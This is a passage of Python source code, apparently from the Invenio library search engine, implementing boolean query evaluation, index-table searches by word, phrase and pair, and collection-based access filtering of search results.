if of.startswith('h') and display_nearest_terms_box:
if req:
if bsu_f == "recid":
write_warning(_("Requested record does not seem to exist."), req=req)
else:
write_warning(create_nearest_terms_box(req.argd, bsu_p, bsu_f, bsu_m, ln=ln), req=req)
return hitset_empty
if verbose and of.startswith("h"):
t2 = os.times()[4]
for idx_unit in range(0, len(basic_search_units)):
write_warning("Search stage 2: basic search unit %s gave %d hits." %
(basic_search_units[idx_unit][1:], len(basic_search_units_hitsets[idx_unit])), req=req)
write_warning("Search stage 2: execution took %.2f seconds." % (t2 - t1), req=req)
# search stage 3: apply boolean query for each search unit:
if verbose and of.startswith("h"):
t1 = os.times()[4]
# let the initial set be the complete universe:
hitset_in_any_collection = intbitset(trailing_bits=1)
hitset_in_any_collection.discard(0)
for idx_unit in xrange(len(basic_search_units)):
this_unit_operation = basic_search_units[idx_unit][0]
this_unit_hitset = basic_search_units_hitsets[idx_unit]
if this_unit_operation == '+':
hitset_in_any_collection.intersection_update(this_unit_hitset)
elif this_unit_operation == '-':
hitset_in_any_collection.difference_update(this_unit_hitset)
elif this_unit_operation == '|':
hitset_in_any_collection.union_update(this_unit_hitset)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(this_unit_operation), "Error", req=req)
if len(hitset_in_any_collection) == 0:
# no hits found, propose alternative boolean query:
if of.startswith('h') and display_nearest_terms_box:
nearestterms = []
for idx_unit in range(0, len(basic_search_units)):
bsu_o, bsu_p, bsu_f, bsu_m = basic_search_units[idx_unit]
if bsu_p.startswith("%") and bsu_p.endswith("%"):
bsu_p = "'" + bsu_p[1:-1] + "'"
bsu_nbhits = len(basic_search_units_hitsets[idx_unit])
# create a similar query, but with the basic search unit only
argd = {}
argd.update(req.argd)
argd['p'] = bsu_p
argd['f'] = bsu_f
nearestterms.append((bsu_p, bsu_nbhits, argd))
text = websearch_templates.tmpl_search_no_boolean_hits(
ln=ln, nearestterms=nearestterms)
write_warning(text, req=req)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 3: boolean query gave %d hits." % len(hitset_in_any_collection), req=req)
write_warning("Search stage 3: execution took %.2f seconds." % (t2 - t1), req=req)
return hitset_in_any_collection
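# Illustrative sketch of search_pattern() (hypothetical record content, kept
# as a comment so that nothing is executed at import time): a query such as
#
#     search_pattern(p='ellis muon', f='', m=None, of='id')
#
# is typically broken into two '+' (AND) basic search units in stage 1, each
# unit is searched individually in stage 2, and the resulting hitsets are
# intersected in stage 3, yielding an intbitset of recIDs matching both terms.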
def search_pattern_parenthesised(req=None, p=None, f=None, m=None, ap=0, of="id", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True, wl=0):
"""Search for complex pattern 'p' containing parenthesis within field 'f' according to
matching type 'm'. Return hitset of recIDs.
For more details on the parameters see 'search_pattern'
"""
_ = gettext_set_language(ln)
spires_syntax_converter = SpiresToInvenioSyntaxConverter()
spires_syntax_query = False
# if the pattern uses SPIRES search syntax, convert it to Invenio syntax
if spires_syntax_converter.is_applicable(p):
spires_syntax_query = True
p = spires_syntax_converter.convert_query(p)
# sanity check: do not call parenthesised parser for search terms
# like U(1) but still call it for searches like ('U(1)' | 'U(2)'):
if not re_pattern_parens.search(re_pattern_parens_quotes.sub('_', p)):
return search_pattern(req, p, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
# Try searching with parentheses
try:
parser = SearchQueryParenthesisedParser()
# get a hitset with all recids
result_hitset = intbitset(trailing_bits=1)
        # parse the query. The result is a list of the form [op1, expr1, op2, expr2, ..., opN, exprN]
parsing_result = parser.parse_query(p)
if verbose and of.startswith("h"):
write_warning("Search stage 1: search_pattern_parenthesised() searched %s." % repr(p), req=req)
write_warning("Search stage 1: search_pattern_parenthesised() returned %s." % repr(parsing_result), req=req)
# go through every pattern
# calculate hitset for it
# combine pattern's hitset with the result using the corresponding operator
for index in xrange(0, len(parsing_result)-1, 2 ):
current_operator = parsing_result[index]
current_pattern = parsing_result[index+1]
if CFG_INSPIRE_SITE and spires_syntax_query:
# setting ap=0 to turn off approximate matching for 0 results.
# Doesn't work well in combinations.
# FIXME: The right fix involves collecting statuses for each
# hitset, then showing a nearest terms box exactly once,
# outside this loop.
ap = 0
display_nearest_terms_box = False
# obtain a hitset for the current pattern
current_hitset = search_pattern(req, current_pattern, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
# combine the current hitset with resulting hitset using the current operator
if current_operator == '+':
result_hitset = result_hitset & current_hitset
elif current_operator == '-':
result_hitset = result_hitset - current_hitset
elif current_operator == '|':
result_hitset = result_hitset | current_hitset
else:
assert False, "Unknown operator in search_pattern_parenthesised()"
return result_hitset
    # If searching with parentheses fails, perform search ignoring parentheses
except SyntaxError:
write_warning(_("Search syntax misunderstood. Ignoring all parentheses in the query. If this doesn't help, please check your search and try again."), req=req)
        # remove the parentheses in the query. The current implementation removes all the parentheses,
        # but it could be improved to remove only those that are not inside quotes
p = p.replace('(', ' ')
p = p.replace(')', ' ')
return search_pattern(req, p, f, m, ap, of, verbose, ln, display_nearest_terms_box=display_nearest_terms_box, wl=wl)
def search_unit(p, f=None, m=None, wl=0, ignore_synonyms=None):
"""Search for basic search unit defined by pattern 'p' and field
'f' and matching type 'm'. Return hitset of recIDs.
All the parameters are assumed to have been previously washed.
'p' is assumed to be already a ``basic search unit'' so that it
is searched as such and is not broken up in any way. Only
wildcard and span queries are being detected inside 'p'.
If CFG_WEBSEARCH_SYNONYM_KBRS is set and we are searching in
one of the indexes that has defined runtime synonym knowledge
base, then look up there and automatically enrich search
results with results for synonyms.
In case the wildcard limit (wl) is greater than 0 and this limit
is reached an InvenioWebSearchWildcardLimitError will be raised.
In case you want to call this function with no limit for the
wildcard queries, wl should be 0.
Parameter 'ignore_synonyms' is a list of terms for which we
should not try to further find a synonym.
This function is suitable as a low-level API.
"""
## create empty output results set:
hitset = intbitset()
if not p: # sanity checking
return hitset
tokenizer = get_field_tokenizer_type(f)
hitset_cjk = intbitset()
if tokenizer == "BibIndexCJKTokenizer":
if is_there_any_CJK_character_in_text(p):
cjk_tok = BibIndexCJKTokenizer()
chars = cjk_tok.tokenize_for_words(p)
for char in chars:
hitset_cjk |= search_unit_in_bibwords(char, f, m, wl)
## eventually look up runtime synonyms:
hitset_synonyms = intbitset()
if CFG_WEBSEARCH_SYNONYM_KBRS.has_key(f):
if ignore_synonyms is None:
ignore_synonyms = []
ignore_synonyms.append(p)
for p_synonym in get_synonym_terms(p,
CFG_WEBSEARCH_SYNONYM_KBRS[f][0],
CFG_WEBSEARCH_SYNONYM_KBRS[f][1]):
if p_synonym != p and \
not p_synonym in ignore_synonyms:
hitset_synonyms |= search_unit(p_synonym, f, m, wl,
ignore_synonyms)
## look up hits:
if f == 'fulltext' and get_idx_indexer('fulltext') == 'SOLR' and CFG_SOLR_URL:
# redirect to Solr
try:
return search_unit_in_solr(p, f, m)
except:
# There were troubles with getting full-text search
# results from Solr. Let us alert the admin of these
# problems and let us simply return empty results to the
# end user.
register_exception()
return hitset
elif f == 'fulltext' and get_idx_indexer('fulltext') == 'XAPIAN' and CFG_XAPIAN_ENABLED:
# redirect to Xapian
try:
return search_unit_in_xapian(p, f, m)
except:
# There were troubles with getting full-text search
# results from Xapian. Let us alert the admin of these
# problems and let us simply return empty results to the
# end user.
register_exception()
return hitset
if f == 'datecreated':
hitset = search_unit_in_bibrec(p, p, 'c')
elif f == 'datemodified':
hitset = search_unit_in_bibrec(p, p, 'm')
elif f == 'refersto':
# we are doing search by the citation count
hitset = search_unit_refersto(p)
elif f == 'rawref':
from invenio.refextract_api import search_from_reference
field, pattern = search_from_reference(p)
return search_unit(pattern, field)
elif f == 'citedby':
# we are doing search by the citation count
hitset = search_unit_citedby(p)
elif f == 'collection':
# we are doing search by the collection name or MARC field
hitset = search_unit_collection(p, m, wl=wl)
elif m == 'a' or m == 'r':
# we are doing either phrase search or regexp search
if f == 'fulltext':
# FIXME: workaround for not having phrase index yet
return search_pattern(None, p, f, 'w')
index_id = get_index_id_from_field(f)
if index_id != 0:
if m == 'a' and index_id in get_idxpair_field_ids():
#for exact match on the admin configured fields we are searching in the pair tables
hitset = search_unit_in_idxpairs(p, f, m, wl)
else:
hitset = search_unit_in_idxphrases(p, f, m, wl)
else:
hitset = search_unit_in_bibxxx(p, f, m, wl)
# if not hitset and m == 'a' and (p[0] != '%' and p[-1] != '%'):
# #if we have no results by doing exact matching, do partial matching
# #for removing the distinction between simple and double quotes
# hitset = search_unit_in_bibxxx('%' + p + '%', f, m, wl)
elif p.startswith("cited:"):
# we are doing search by the citation count
hitset = search_unit_by_times_cited(p[6:])
else:
# we are doing bibwords search by default
hitset = search_unit_in_bibwords(p, f, m, wl=wl)
## merge synonym results and return total:
hitset |= hitset_synonyms
hitset |= hitset_cjk
return hitset
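# Illustrative sketch of search_unit() (hypothetical index content, kept as a
# comment so that nothing is executed at import time):
#
#     search_unit('ellis', 'author', 'a')   # phrase-type search in the author index
#     search_unit('elli*', 'author')        # word search with truncation
#     search_unit('2004->2006', 'year')     # span query handled by the word index
#
# Each call returns an intbitset of recIDs; synonym and CJK hits, if any,
# are merged into the result before it is returned.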
def get_idxpair_field_ids():
"""Returns the list of ids for the fields that idxPAIRS should be used on"""
index_dict = dict(run_sql("SELECT name, id FROM idxINDEX"))
return [index_dict[field] for field in index_dict if field in CFG_WEBSEARCH_IDXPAIRS_FIELDS]
def search_unit_in_bibwords(word, f, m=None, decompress=zlib.decompress, wl=0):
"""Searches for 'word' inside bibwordsX table for field 'f' and returns hitset of recIDs."""
set = intbitset() # will hold output result set
set_used = 0 # not-yet-used flag, to be able to circumvent set operations
limit_reached = 0 # flag for knowing if the query limit has been reached
# if no field is specified, search in the global index.
f = f or 'anyfield'
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
stemming_language = get_index_stemming_language(index_id)
else:
return intbitset() # word index f does not exist
# wash 'word' argument and run query:
if f.endswith('count') and word.endswith('+'):
# field count query of the form N+ so transform N+ to N->99999:
word = word[:-1] + '->99999'
word = string.replace(word, '*', '%') # we now use '*' as the truncation character
words = string.split(word, "->", 1) # check for span query
if len(words) == 2:
word0 = re_word.sub('', words[0])
word1 = re_word.sub('', words[1])
if stemming_language:
word0 = lower_index_term(word0)
word1 = lower_index_term(word1)
word0 = stem(word0, stemming_language)
word1 = stem(word1, stemming_language)
word0_washed = wash_index_term(word0)
word1_washed = wash_index_term(word1)
if f.endswith('count'):
# field count query; convert to integers in order
# to have numerical behaviour for 'BETWEEN n1 AND n2' query
try:
word0_washed = int(word0_washed)
word1_washed = int(word1_washed)
except ValueError:
pass
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term BETWEEN %%s AND %%s" % bibwordsX,
(word0_washed, word1_washed), wildcard_limit = wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
if f == 'journal':
pass # FIXME: quick hack for the journal index
else:
word = re_word.sub('', word)
if stemming_language:
word = lower_index_term(word)
word = stem(word, stemming_language)
if string.find(word, '%') >= 0: # do we have wildcard in the word?
if f == 'journal':
# FIXME: quick hack for the journal index
# FIXME: we can run a sanity check here for all indexes
res = ()
else:
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term LIKE %%s" % bibwordsX,
(wash_index_term(word),), wildcard_limit = wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term,hitlist FROM %s WHERE term=%%s" % bibwordsX,
(wash_index_term(word),))
# fill the result set:
for word, hitlist in res:
hitset_bibwrd = intbitset(hitlist)
# add the results:
if set_used:
set.union_update(hitset_bibwrd)
else:
set = hitset_bibwrd
set_used = 1
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
# okay, return result set:
return set
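# Illustrative sketch of search_unit_in_bibwords() (hypothetical index
# content, kept as a comment so that nothing is executed at import time):
# inside the function the pattern
#
#     'muon*'       becomes roughly the SQL condition  term LIKE 'muon%'
#     '2004->2006'  becomes roughly                    term BETWEEN '2004' AND '2006'
#
# (both after washing/stemming), and the hitlists of all matching terms are
# OR-ed together into the returned intbitset.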
def search_unit_in_idxpairs(p, f, type, wl=0):
"""Searches for pair 'p' inside idxPAIR table for field 'f' and
returns hitset of recIDs found."""
limit_reached = 0 # flag for knowing if the query limit has been reached
do_exact_search = True # flag to know when it makes sense to try to do exact matching
result_set = intbitset()
#determine the idxPAIR table to read from
index_id = get_index_id_from_field(f)
if not index_id:
return intbitset()
stemming_language = get_index_stemming_language(index_id)
pairs_tokenizer = BibIndexDefaultTokenizer(stemming_language)
idxpair_table_washed = wash_table_column_name("idxPAIR%02dF" % index_id)
if p.startswith("%") and p.endswith("%"):
p = p[1:-1]
original_pattern = p
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
queries_releated_vars = [] # contains tuples of (query_addons, query_params, use_query_limit)
#is it a span query?
ps = string.split(p, "->", 1)
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
#so we are dealing with a span query
pairs_left = pairs_tokenizer.tokenize_for_pairs(ps[0])
pairs_right = pairs_tokenizer.tokenize_for_pairs(ps[1])
if not pairs_left or not pairs_right:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
elif len(pairs_left) != len(pairs_right):
            # it is kind of hard to know what the user actually wanted;
            # we would have to do: foo bar baz -> qux xyz, so let's switch to phrase search
return search_unit_in_idxphrases(original_pattern, f, type, wl)
elif len(pairs_left) > 1 and \
len(pairs_right) > 1 and \
pairs_left[:-1] != pairs_right[:-1]:
# again we have something like: foo bar baz -> abc xyz qux
# so we'd better switch to phrase
return search_unit_in_idxphrases(original_pattern, f, type, wl)
else:
# finally, we can treat the search using idxPairs
# at this step we have either: foo bar -> abc xyz
# or foo bar abc -> foo bar xyz
queries_releated_vars = [("BETWEEN %s AND %s", (pairs_left[-1], pairs_right[-1]), True)]
            for pair in pairs_left[:-1]:  # which should be equal to pairs_right[:-1]
queries_releated_vars.append(("= %s", (pair, ), False))
do_exact_search = False # no exact search for span queries
elif string.find(p, '%') > -1:
#tokenizing p will remove the '%', so we have to make sure it stays
        replacement = 'xxxxxxxxxx'  # hopefully this will not clash with anything in the future
p = string.replace(p, '%', replacement)
pairs = pairs_tokenizer.tokenize_for_pairs(p)
if not pairs:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
queries_releated_vars = []
for pair in pairs:
if string.find(pair, replacement) > -1:
pair = string.replace(pair, replacement, '%') #we replace back the % sign
queries_releated_vars.append(("LIKE %s", (pair, ), True))
else:
queries_releated_vars.append(("= %s", (pair, ), False))
do_exact_search = False
else:
#normal query
pairs = pairs_tokenizer.tokenize_for_pairs(p)
if not pairs:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
queries_releated_vars = []
for pair in pairs:
queries_releated_vars.append(("= %s", (pair, ), False))
first_results = 1 # flag to know if it's the first set of results or not
for query_var in queries_releated_vars:
query_addons = query_var[0]
query_params = query_var[1]
use_query_limit = query_var[2]
if use_query_limit:
try:
res = run_sql_with_limit("SELECT term, hitlist FROM %s WHERE term %s" \
% (idxpair_table_washed, query_addons), query_params, wildcard_limit=wl) #kwalitee:disable=sql
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term, hitlist FROM %s WHERE term %s" \
% (idxpair_table_washed, query_addons), query_params) #kwalitee:disable=sql
if not res:
return intbitset()
for pair, hitlist in res:
hitset_idxpairs = intbitset(hitlist)
if first_results:
result_set = hitset_idxpairs
first_results = 0
else:
result_set.intersection_update(hitset_idxpairs)
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(result_set)
# check if we need to eliminate the false positives
if CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH and do_exact_search:
# we need to eliminate the false positives
idxphrase_table_washed = wash_table_column_name("idxPHRASE%02dR" % index_id)
not_exact_search = intbitset()
for recid in result_set:
res = run_sql("SELECT termlist FROM %s WHERE id_bibrec %s" %(idxphrase_table_washed, '=%s'), (recid, )) #kwalitee:disable=sql
if res:
termlist = deserialize_via_marshal(res[0][0])
if not [term for term in termlist if term.lower().find(p.lower()) > -1]:
not_exact_search.add(recid)
else:
not_exact_search.add(recid)
# remove the recs that are false positives from the final result
result_set.difference_update(not_exact_search)
return result_set
def search_unit_in_idxphrases(p, f, type, wl=0):
"""Searches for phrase 'p' inside idxPHRASE*F table for field 'f' and returns hitset of recIDs found.
The search type is defined by 'type' (e.g. equals to 'r' for a regexp search)."""
# call word search method in some cases:
if f.endswith('count'):
return search_unit_in_bibwords(p, f, wl=wl)
set = intbitset() # will hold output result set
set_used = 0 # not-yet-used flag, to be able to circumvent set operations
limit_reached = 0 # flag for knowing if the query limit has been reached
use_query_limit = False # flag for knowing if to limit the query results or not
# deduce in which idxPHRASE table we will search:
idxphraseX = "idxPHRASE%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
idxphraseX = "idxPHRASE%02dF" % index_id
else:
return intbitset() # phrase index f does not exist
# detect query type (exact phrase, partial phrase, regexp):
if type == 'r':
query_addons = "REGEXP %s"
query_params = (p,)
use_query_limit = True
else:
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
ps = string.split(p, "->", 1) # check for span query:
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
query_addons = "BETWEEN %s AND %s"
query_params = (ps[0], ps[1])
use_query_limit = True
else:
if string.find(p, '%') > -1:
query_addons = "LIKE %s"
query_params = (p,)
use_query_limit = True
else:
query_addons = "= %s"
query_params = (p,)
# special washing for fuzzy author index:
if f in ('author', 'firstauthor', 'exactauthor', 'exactfirstauthor', 'authorityauthor'):
query_params_washed = ()
for query_param in query_params:
query_params_washed += (wash_author_name(query_param),)
query_params = query_params_washed
# perform search:
if use_query_limit:
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term %s" % (idxphraseX, query_addons),
query_params, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term,hitlist FROM %s WHERE term %s" % (idxphraseX, query_addons), query_params)
# fill the result set:
for word, hitlist in res:
hitset_bibphrase = intbitset(hitlist)
# add the results:
if set_used:
set.union_update(hitset_bibphrase)
else:
set = hitset_bibphrase
set_used = 1
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
# okay, return result set:
return set
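# Hedged usage sketch for search_unit_in_idxphrases (the 'author' field and
# the pattern below are made-up examples; real field names depend on the
# local index configuration):
#
#     hits = search_unit_in_idxphrases('ellis, j*', 'author', 'e')
#     # '*' is turned into '%' and matched with LIKE, 'a -> b' patterns become
#     # BETWEEN range queries, and type 'r' switches to a REGEXP match.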
def search_unit_in_bibxxx(p, f, type, wl=0):
"""Searches for pattern 'p' inside bibxxx tables for field 'f' and returns hitset of recIDs found.
The search type is defined by 'type' (e.g. equals to 'r' for a regexp search)."""
# call word search method in some cases:
if f == 'journal' or f.endswith('count'):
return search_unit_in_bibwords(p, f, wl=wl)
p_orig = p # saving for eventual future 'no match' reporting
limit_reached = 0 # flag for knowing if the query limit has been reached
use_query_limit = False # flag for knowing if to limit the query results or not
query_addons = "" # will hold additional SQL code for the query
query_params = () # will hold parameters for the query (their number may vary depending on TYPE argument)
# wash arguments:
f = string.replace(f, '*', '%') # replace truncation char '*' in field definition
if type == 'r':
query_addons = "REGEXP %s"
query_params = (p,)
use_query_limit = True
else:
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
ps = string.split(p, "->", 1) # check for span query:
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
query_addons = "BETWEEN %s AND %s"
query_params = (ps[0], ps[1])
use_query_limit = True
else:
if string.find(p, '%') > -1:
query_addons = "LIKE %s"
query_params = (p,)
use_query_limit = True
else:
query_addons = "= %s"
query_params = (p,)
# construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if len(f) >= 2 and str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
if not tl:
# f index does not exist, nevermind
pass
# okay, start search:
l = [] # will hold list of recID that matched
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
# construct and run query:
if t == "001":
if query_addons.find('BETWEEN') > -1 or query_addons.find('=') > -1:
# verify that the params are integers (to avoid returning record 123 when searching for 123foo)
try:
query_params = tuple(int(param) for param in query_params)
except ValueError:
return intbitset()
if use_query_limit:
try:
res = run_sql_with_limit("SELECT id FROM bibrec WHERE id %s" % query_addons,
query_params, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT id FROM bibrec WHERE id %s" % query_addons,
query_params)
else:
query = "SELECT bibx.id_bibrec FROM %s AS bx LEFT JOIN %s AS bibx ON bx.id=bibx.id_bibxxx WHERE bx.value %s" % \
(bx, bibx, query_addons)
if len(t) != 6 or t[-1:]=='%':
# wildcard query, or only the beginning of field 't'
# is defined, so add wildcard character:
query += " AND bx.tag LIKE %s"
query_params_and_tag = query_params + (t + '%',)
else:
# exact query for 't':
query += " AND bx.tag=%s"
query_params_and_tag = query_params + (t,)
if use_query_limit:
try:
res = run_sql_with_limit(query, query_params_and_tag, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql(query, query_params_and_tag)
# fill the result set:
for id_bibrec in res:
if id_bibrec[0]:
l.append(id_bibrec[0])
# check no of hits found:
nb_hits = len(l)
# okay, return result set:
set = intbitset(l)
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
return set
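# Hedged usage sketch for search_unit_in_bibxxx (field and pattern are
# illustrative; the field is first mapped to MARC tags via get_field_tags()):
#
#     hits = search_unit_in_bibxxx('CERN-PS-*', 'reportnumber', 'a')
#     # '*' becomes '%', so each configured bibXXx table is queried with
#     # "bx.value LIKE 'CERN-PS-%'" joined against bibrec_bibXXx.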
def search_unit_in_solr(p, f=None, m=None):
"""
Query a Solr index and return an intbitset corresponding
to the result. Parameters (p,f,m) are usual search unit ones.
"""
if m and (m == 'a' or m == 'r'): # phrase/regexp query
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
p = '"' + p + '"'
return solr_get_bitset(f, p)
def search_unit_in_xapian(p, f=None, m=None):
"""
Query a Xapian index and return an intbitset corresponding
to the result. Parameters (p,f,m) are usual search unit ones.
"""
if m and (m == 'a' or m == 'r'): # phrase/regexp query
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
p = '"' + p + '"'
return xapian_get_bitset(f, p)
def search_unit_in_bibrec(datetext1, datetext2, type='c'):
"""
Return hitset of recIDs found that were either created or modified
(according to 'type' arg being 'c' or 'm') from datetext1 until datetext2, inclusive.
Does not pay attention to pattern, collection, anything. Useful
to intersect later on with the 'real' query.
"""
set = intbitset()
if type and type.startswith("m"):
type = "modification_date"
else:
type = "creation_date" # by default we are searching for creation dates
parts = datetext1.split('->')
if len(parts) > 1 and datetext1 == datetext2:
datetext1 = parts[0]
datetext2 = parts[1]
if datetext1 == datetext2:
res = run_sql("SELECT id FROM bibrec WHERE %s LIKE %%s" % (type,),
(datetext1 + '%',))
else:
res = run_sql("SELECT id FROM bibrec WHERE %s>=%%s AND %s<=%%s" % (type, type),
(datetext1, datetext2))
for row in res:
set += row[0]
return set
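# Hedged usage sketch for search_unit_in_bibrec (dates are illustrative):
#
#     created_2012 = search_unit_in_bibrec('2012-01-01', '2012-12-31', 'c')
#     modified_may = search_unit_in_bibrec('2014-05', '2014-05', 'm')
#     # equal endpoints fall back to a LIKE 'datetext%' prefix match, while a
#     # 'd1->d2' span passed as both arguments is split into its endpoints.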
def search_unit_by_times_cited(p):
"""
    Return hitset of recIDs found that are cited P times.
Usually P looks like '10->23'.
"""
numstr = '"'+p+'"'
#this is sort of stupid but since we may need to
#get the records that do _not_ have cites, we have to
#know the ids of all records, too
    #but this is needed only if p is 0, '0', or a range starting or ending with 0
allrecs = []
if p == 0 or p == "0" or \
p.startswith("0->") or p.endswith("->0"):
allrecs = intbitset(run_sql("SELECT id FROM bibrec"))
return get_records_with_num_cites(numstr, allrecs)
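# Hedged usage sketch for search_unit_by_times_cited (ranges are illustrative):
#
#     search_unit_by_times_cited('10->23')   # records cited 10 to 23 times
#     search_unit_by_times_cited('0')        # needs the full recid list too,
#                                            # to find records with no cites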
def search_unit_refersto(query):
"""
Search for records satisfying the query (e.g. author:ellis) and
return list of records referred to by these records.
"""
if query:
ahitset = search_pattern(p=query)
if ahitset:
return get_refersto_hitset(ahitset)
else:
return intbitset([])
else:
return intbitset([])
def search_unit_citedby(query):
"""
Search for records satisfying the query (e.g. author:ellis) and
return list of records cited by these records.
"""
if query:
ahitset = search_pattern(p=query)
if ahitset:
return get_citedby_hitset(ahitset)
else:
return intbitset([])
else:
return intbitset([])
def search_unit_collection(query, m, wl=None):
"""
Search for records satisfying the query (e.g. collection:"BOOK" or
collection:"Books") and return list of records in the collection.
"""
if len(query):
ahitset = get_collection_reclist(query)
if not ahitset:
return search_unit_in_bibwords(query, 'collection', m, wl=wl)
return ahitset
else:
return intbitset([])
def get_records_that_can_be_displayed(user_info,
hitset_in_any_collection,
current_coll=CFG_SITE_NAME,
colls=None):
"""
Return records that can be displayed.
"""
records_that_can_be_displayed = intbitset()
if colls is None:
colls = [current_coll]
# let's get the restricted collections the user has rights to view
permitted_restricted_collections = user_info.get('precached_permitted_restricted_collections', [])
policy = CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY.strip().upper()
current_coll_children = get_collection_allchildren(current_coll) # real & virtual
# add all restricted collections, that the user has access to, and are under the current collection
# do not use set here, in order to maintain a specific order:
# children of 'cc' (real, virtual, restricted), rest of 'c' that are not cc's children
colls_to_be_displayed = [coll for coll in current_coll_children if coll in colls or coll in permitted_restricted_collections]
colls_to_be_displayed.extend([coll for coll in colls if coll not in colls_to_be_displayed])
if policy == 'ANY':# the user needs to have access to at least one collection that restricts the records
#we need this to be able to remove records that are both in a public and restricted collection
permitted_recids = intbitset()
notpermitted_recids = intbitset()
for collection in restricted_collection_cache.cache:
if collection in permitted_restricted_collections:
permitted_recids |= get_collection_reclist(collection)
else:
notpermitted_recids |= get_collection_reclist(collection)
records_that_can_be_displayed = hitset_in_any_collection - (notpermitted_recids - permitted_recids)
    else: # the user needs to have access to all collections that restrict a record
notpermitted_recids = intbitset()
for collection in restricted_collection_cache.cache:
if collection not in permitted_restricted_collections:
notpermitted_recids |= get_collection_reclist(collection)
records_that_can_be_displayed = hitset_in_any_collection - notpermitted_recids
if records_that_can_be_displayed.is_infinite():
# We should not return infinite results for user.
records_that_can_be_displayed = intbitset()
for coll in colls_to_be_displayed:
records_that_can_be_displayed |= get_collection_reclist(coll)
return records_that_can_be_displayed
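# The two CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY branches above boil down to
# simple intbitset arithmetic; a minimal sketch with made-up record sets:
#
#     hits          = intbitset([1, 2, 3, 4])
#     not_permitted = intbitset([3, 4])  # recs only in colls the user may not view
#     permitted     = intbitset([4])     # recs in restricted colls the user may view
#     # policy 'ANY'  : hits - (not_permitted - permitted)  ->  intbitset([1, 2, 4])
#     # other policies: hits - not_permitted                ->  intbitset([1, 2])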
def intersect_results_with_collrecs(req, hitset_in_any_collection, colls, ap=0, of="hb", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True):
"""Return dict of hitsets given by intersection of hitset with the collection universes."""
_ = gettext_set_language(ln)
# search stage 4: intersect with the collection universe
if verbose and of.startswith("h"):
t1 = os.times()[4]
results = {} # all final results
results_nbhits = 0
# calculate the list of recids (restricted or not) that the user has rights to access and we should display (only those)
if not req or isinstance(req, cStringIO.OutputType): # called from CLI
user_info = {}
for coll in colls:
results[coll] = hitset_in_any_collection & get_collection_reclist(coll)
results_nbhits += len(results[coll])
records_that_can_be_displayed = hitset_in_any_collection
permitted_restricted_collections = []
else:
user_info = collect_user_info(req)
# let's get the restricted collections the user has rights to view
if user_info['guest'] == '1':
permitted_restricted_collections = []
## For guest users that are actually authorized to some restricted
## collection (by virtue of the IP address in a FireRole rule)
## we explicitly build the list of permitted_restricted_collections
for coll in colls:
if collection_restricted_p(coll) and (acc_authorize_action(user_info, 'viewrestrcoll', collection=coll)[0] == 0):
permitted_restricted_collections.append(coll)
else:
permitted_restricted_collections = user_info.get('precached_permitted_restricted_collections', [])
        # let's build the list of both the public and restricted
        # child collections of the collection from which the user
        # started his/her search. This list of child collections will be
        # used in the warning proposing a search in those collections
try:
current_coll = req.argd['cc'] # current_coll: coll from which user started his/her search
except:
from flask import request
current_coll = request.args.get('cc', CFG_SITE_NAME) # current_coll: coll from which user started his/her search
current_coll_children = get_collection_allchildren(current_coll) # real & virtual
# add all restricted collections, that the user has access to, and are under the current collection
# do not use set here, in order to maintain a specific order:
# children of 'cc' (real, virtual, restricted), rest of 'c' that are not cc's children
